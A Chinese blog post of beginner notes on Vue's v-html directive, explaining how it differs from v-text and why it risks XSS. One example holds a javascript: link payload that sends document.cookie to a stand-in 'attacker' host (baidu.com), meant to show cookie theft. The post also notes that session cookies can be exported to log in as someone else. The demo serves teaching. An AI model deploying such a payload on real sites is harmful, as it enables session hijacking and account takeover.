Vue学习:v-html

最新推荐文章于 2024-05-06 20:52:53 发布
最新推荐文章于 2024-05-06 20:52:53 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: Vue 文章标签: 学习 Powered by 金山文档
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_47295886/article/details/129045112
版权

v-html:支持结构解析与v-text区别

v-html:支持结构解析 向指定节点中渲染包含html结构的内容

    <div id='root'>
     <h2>{{name}} sssssss</h2>
     <h2 v-text="name">ssssssss</h2>
     <div v-html="a"></div>
     
    </div>
    <script>
        new Vue({
            el: '#root',
            data: {
                name:'xdd',
                a:'<h1>支持结构解析</h1>'
            },
           

        });

如何通过密码账号 通过cookies验证安全性的

在应用里面的cookies有各个网站的cookie

Cookie Editor 可以导出所有cookies和导入 之后刷新 就直接登录了

双击 直接自己编写cookie 刷新页面cookies不会丢失

如何通过js代码获取cookies

document.cookie获取网站的所有cookie

安全性问题:坏蛋获取了你的cookie 登陆了你的账号 

<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
    <script src="https://cdn.bootcdn.net/ajax/libs/dayjs/1.11.7/dayjs.min.js"></script>
    <script type="text/javascript" src="./js引入/测试版本/vue.js"></script>
</head>

<body>
    <!-- 准备容器 -->
    <!--
        已经学过的指令
        v-bind:单项绑定解析表达式
        v-model:双向数据绑定
        v-for:遍历数组/对象/字符串
        v-on:绑定事件监听 简写@
        v-if:条件渲染 动态控制节点是否存在
        v-else:条件渲染 动态控制节点是否存在
        v-show:条件渲染 动态控制节点是否展示
        v-text:向其所在的节点插入文本  并不会识别标签
         v-html:支持结构解析
     -->
    <div id='root'>
     <h2>{{name}} sssssss</h2>
     <h2 v-text="name">ssssssss</h2>
     <div v-html="a"></div>
     <div v-html="b"></div>
     
    </div>
    <script>
        new Vue({
            el: '#root',
            data: {
                name:'xdd',
                a:'<h1>支持结构解析</h1>',
                // 用百度举例子 坏人的服务器
                //document.cookie 获取你当前网站的所有cookie 并且传走
                b:'<a href=javascript:location.href="http://www.baidu.com?"+document.cookie>你要的xxx我找到了</a>'
            },
           

        });

    </script>
</body>

</html>

document.cookie 获取你当前网站的所有cookie 并且传走

当然有些网站有http only :限制cookie,也就是说只有http协议可读取,可以携带也就是doucment.cookie 不可以了js代码不可以

也就是标签写在v-html中不行

v-html与插值语法的区别:

v-html会替换掉节点中所有的内容,{{xx}}不会

v-html可以识别html结构

v-html有安全性问题

在网站动态渲染html是危险的,容易导致xss(cookie上的盗用)攻击

一定要再可信的内容上使用v-html,永远不要在用用户体积的内容上

¡Venceremo
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
v-html指令
fushan2012的博客
02-22 4万+
V-html
vue-内置指令
qq_52135740的博客
07-27 367
内置指令 v-text指令: 1.作用:向其所在的节点中渲染文本内容。 2.与插值语法的区别:v-text会替换掉节点中的内容,{{xx}}则不会 <div id="root"> <div>你好,{{name}}</div> <div v-text="name"></div> <div v-text="str"></div> </div> </body> <scrip
深入了解Vue 3.0中的v-html指令:用法、安全性与最佳实践
最新发布
李长渊的博客
05-06 2459
深入了解Vue 3.0中的v-html指令:用法、安全性与最佳实践
Vue指令之v-html
ShadyPi的IT笔记
11-28 1248
例如,当Vue实例的data是一个inner html,我们想在网页上渲染这部分html,如果依然使用之前的。在Vue中有很多特殊的标签属性,这些属性一般以’v’开头,用于在标签中实现特殊的功能。,则只会将inner html的源码显示出来,无法进行渲染。但是如果把容器中的元素添加一个标签属性。,并将该属性的值赋为msg,即。
Vue 常用指令 内容绑定/事件绑定 v-text、v-html、v-on
小楼一夜听春雨,深巷明朝卖杏花
06-16 2853
但是使用v-html的时候那么html的各种属性都能够渲染出来。最终将v-text渲染为一个html的文本。在开发过程当中使用vue的语法,但是在实际最终会将vue的语法转化渲染为html页面。可以看到做文本的时候可以使用v-text,同时也可以看到在vue框架里面可以在HTML标签当中使用vue属性。在前端开发中,我们经常监听用户发生的事件,例如点击、拖拽、键盘事件等。在整个vue的编写过程当中,只要带v-的,那么都是常用的vue的指令。显示HTML文本的,某些情况下,从服务端请求的数据本身就是一个。
Vue的常用指令之v-html
Mr_xiaoxuboke的博客
05-19 1041
说明:在某些时候我们不希望直接输出<a href='http://www.baidu.com'>百度一下</a>这样的字符串,而输出被html自己转化的超链接。此时可以使用v-html。 代码如下: <div id="app"> <h2>{{url}}</h2> <!-- 不加v-html 打印的是字符串 --> <h2 v-html="url">&.
vue样式穿透 ::v-deep的具体使用
10-15
Vue.js 是一款流行的前端框架,它的组件化特性使得开发更加高效。然而,当涉及到组件间的样式隔离时,可能会遇到一些挑战。...在深入学习 Vue 的过程中,理解和熟练掌握 `::v-deep` 是非常重要的一步。
vue学习日记19:记事本-组件版
03-26
"vue学习日记19:记事本-组件版"是一个关于如何利用Vue.js创建一个功能丰富的记事本组件的实例教程。在这个项目中,我们将深入探讨Vue组件的基本概念、组件的生命周期、状态管理和事件通信。 首先,Vue组件是Vue...
vue-boolzapp:Vue-Boolzapp
03-29
Vue.js是前端开发中非常流行的JavaScript库,它专注于视图层,易于学习且功能强大,能够构建用户界面和单页应用程序(SPA)。Vue-Boolzapp可能是一个教学示例或者一个小型项目,用于演示Vue.js的核心特性或特定功能...
vue-todolist:Vue-todolist
04-14
Vue.js 是一个流行的前端JavaScript框架,用于构建用户界面。在这个"Vue-TodoList"项目中,我们可以看到如何...通过学习和实践这个项目,开发者可以深入理解Vue.js的核心概念,并能够构建自己的功能丰富的前端应用。
详解三种方式解决vue中v-html元素中标签样式
12-29
Vue为v-html中标签添加CSS样式 {{news.title}} {{news.datetime}} <button class=back @click=goBack()>返回列表</button> 当我们使用v-html渲染页面
v html的原生实现,Vue.js 源码分析(十九) 指令篇 v-html和v-text指令详解
weixin_36080842的博客
06-09 1431
双大括号会将数据解释为普通文本,而非 html 代码。为了输出真正的 html,你需要使用 v-html 指令,例如:documentvue.config.productiontip=false;vue.config.devtools=false;{{message}}var app = new vue({el:'#app',data:{message:'hell world!'}})渲染结果为:...
Vue v-html用法
热门推荐
liubangbo的专栏
06-18 1万+
如果我们从服务器端获取到了HTML字符串,用浏览器显示出来。在Vue框架下,可以用v-html指令来做。例如: <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>vue demo</title> </head> <body> <script src="./vue.js"></script> <
Vue指令——v-html
quietbxj的博客
08-03 1583
Vue指令是指v-开头的一系列指令,v-html指令的作用: 设置元素的innerHTML。 内容中包含有html结构会被解析成标签。 v-text指令只会解析成文本。 解析文本需要v-text,解析html结构用v-html。 代码如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content=
v-html指令的用法
FGGIT的博客
01-29 698
v-html指令的用法
vue的v-html使用
诚的博客
07-27 1044
使用vue忙碌的开发了几个月的项目,最近终于得以喘息。现在把开发中的问题,总结一下。方便以后观看。 1.vue项目中何时使用v-html标签绑定数据? 当你的数据中有html元素标签,并且希望按照元素标签的样式显示的时候,这个时候就需要使用v-html来绑定数据。 例子: js代码部分: export default { data () { myMess: '<h1> Hello World!</h1>' } } html代码部分:...
vue中v-text、v-html和{{}}
cmolong的博客
03-08 1884
{{}}: 纯文本内容,不会将html标签一并输出,在页面加载时显示{{}},所以通常使用v-html和v-text代替。 v-html=&quot;&quot;:输出html标签中的内容。 v-text=&quot;&quot;:纯文本内容,会将html标签一并输出,与花括号的区别是在页面加载时不显示{{}}。 &amp;lt;!DOCTYPE html&amp;gt; &amp;lt;html&amp;gt; &amp;lt;hea
Vue解决V-HTML指令潜在的XSS攻击
caiqian97的博客
03-23 1423
当其他用户进入该网站后,脚本就在用户不知情的情况下偷偷地执行了,这样的脚本可能会窃取用户的信息、修改页面内容、或者伪造用户执行其他操作等等,后果不可估量。发送到Web浏览器的恶意内容通常采用JavaScript代码片段的形式,但也可能包括HTML,Flash或浏览器可能执行的任何其他类型的代码。XSS是一种注入脚本式攻击,攻击者利用如提交表单、发布评论等方式将事先准备好的恶意脚本注入到那些良性可信的网站中。三、在vue.config.js或vue-loader.config.js中覆写html指令。
v-html
05-31
v-htmlVue.js 中的一个指令,用于将数据以 HTML 格式渲染到页面中。它的使用方式是在模板中使用 v-html 指令,将需要渲染的 HTML 字符串绑定到指令的值上。例如: ``` <div v-html="htmlString"></div> ``` 其中,htmlString 变量包含需要渲染的 HTML 字符串。使用 v-html 指令时需要注意安全性问题,避免注入恶意脚本等攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值